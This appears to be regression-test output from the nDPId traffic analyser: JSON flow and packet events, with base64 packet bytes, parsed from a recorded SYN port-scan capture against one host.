+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_packet_id":1,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061153,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXUAADkGUf2sEAAIQA2GNIzTBH3dU4MZAAAAAGACCAAsDwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9iAAADMGH1KsEAAIQA2GNIzTQmHdU4MZAAAAAGACEADmKgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsvj8AADkGUTOsEAAIQA2GNIzTGWbdU4MZAAAAAGACCAAXJgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsM3gAADYG3vqsEAAIQA2GNIzT\/23dU4MZAAAAAGACDAAtHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAszqIAADIGR9CsEAAIQA2GNIzTD0rdU4MZAAAAAGACDAAdQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AQAACkGK26sEAAIQA2GNIzTBCHdU4MZAAAAAGACCAAsawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs1iEAACcGS1GsEAAIQA2GNIzTF3TdU4MZAAAAAGACEAARGAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs+tUAAC4GH52sEAAIQA2GNIzTGoXdU4MZAAAAAGACDAASBwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAso94AADIGcpSsEAAIQA2GNIzTwA\/dU4MZAAAAAGACDABsfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsjjIAADgGgkCsEAAIQA2GNIzTPpLdU4MZAAAAAGACBAD1+QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAslp4AADEGgNSsEAAIQA2GNIzTzlbdU4MZAAAAAGACCABiNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsSfoAADIGzHisEAAIQA2GNIzTDRfdU4MZAAAAAGACDAAfdQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsZi0AAC0GtUWsEAAIQA2GNIzTF\/HdU4MZAAAAAGACCAAYmwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsQHUAADIG1f2sEAAIQA2GNIzTw1DdU4MZAAAAAGACDABpOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQ8AADEG8mOsEAAIQA2GNIzSBA7dUoMYAAAAAGACCAAsgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsOxEAADIG22GsEAAIQA2GNIzSB9jdUoMYAAAAAGACDAAktwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_packet_id":1,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061155,"pkt":"ACYLMQczACWzv5HuCABFAAAskNcAACgGj5usEAAIQA2GNIzSBNTdUoMYAAAAAGACBAAvuwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAAC4GGTOsEAAIQA2GNIzSAFXdUoMYAAAAAGACDAAsOgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsL9AAADcG4aKsEAAIQA2GNIzSCAHdUoMYAAAAAGACEAAgjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAADcGDW6sEAAIQA2GNIzSGfbdUoMYAAAAAGACEAAOmQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsDuMAACoGD5CsEAAIQA2GNIzSA+\/dUoMYAAAAAGACDAAooAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6QAACgGwM6sEAAIQA2GNIzSBFTdUoMYAAAAAGACBAAwOwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsdbIAACYGrMCsEAAIQA2GNIzSpg7dUoMYAAAAAGACDACGgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsxmUAADQGTg2sEAAIQA2GNIzSAdHdUoMYAAAAAGACBAAyvgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dgAADEGHZqsEAAIQA2GNIzSDDjdUoMYAAAAAGACCAAkVwAAAgQFtA=="} 